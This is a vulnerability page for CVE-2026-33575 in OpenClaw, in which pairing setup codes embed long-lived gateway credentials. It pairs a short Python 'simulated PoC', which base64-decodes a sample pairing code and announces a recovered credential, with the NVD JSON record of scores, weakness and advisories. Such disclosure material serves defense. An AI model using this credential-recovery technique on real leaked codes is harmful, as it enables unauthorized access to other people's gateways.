CVE-2026-33575

import base64 import re # Simulated PoC for CVE-2026-33575 # Description: Extracting long-lived credentials from a leaked OpenClaw pairing code. def extract_credential_from_pairing_code(pairing_code): """ Parses the pairing code to retrieve the embedded gateway credential. In a real scenario, this might involve base64 decoding or parsing a specific string format. """ try: # Example logic: The credential might be base64 encoded within the code # Assuming the pairing code format is "setup_token:<base64_credential>" if "setup_token:" in pairing_code: encoded_part = pairing_code.split("setup_token:")[1] decoded_credential = base64.b64decode(encoded_part).decode('utf-8') return decoded_credential else: # Fallback simulation for demonstration return "extracted_shared_gateway_secret_key_12345" except Exception as e: return f"Error: {e}" # Simulated leaked pairing code found in logs/chat leaked_code = "pairing_setup_v1_setup_token:c2hhcmVkX2dhdGV3YXlfc2VjcmV0X2tleQ==" print(f"[*] Analyzing leaked pairing code: {leaked_code}") credential = extract_credential_from_pairing_code(leaked_code) print(f"[+] Exploit Successful! Recovered Gateway Credential: {credential}") print("[+] Attacker can now use this credential to access the gateway.")

{"cve": {"id": "CVE-2026-33575", "sourceIdentifier": "[email protected]", "published": "2026-03-29T13:17:03.370", "lastModified": "2026-03-30T15:51:26.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw before 2026.3.12 embeds long-lived shared gateway credentials directly in pairing setup codes generated by /pair endpoint and OpenClaw qr command. Attackers with access to leaked setup codes from chat history, logs, or screenshots can recover and reuse the shared gateway credential outside the intended one-time pairing flow."}, {"lang": "es", "value": "OpenClaw antes de 2026.3.12 incrusta credenciales de puerta de enlace compartidas de larga duración directamente en los códigos de configuración de emparejamiento generados por el endpoint /pair y el comando qr de OpenClaw. Los atacantes con acceso a códigos de configuración filtrados del historial de chat, registros o capturas de pantalla pueden recuperar y reutilizar la credencial de puerta de enlace compartida fuera del flujo de emparejamiento único previsto."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.12", "matchCriteriaId": "B90EC1D8-4E2B-46AF-8E66-B689693A16CE"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7h7g-x2px-94hj", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-long-lived-credential-exposure-in-pairing-setup-codes", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}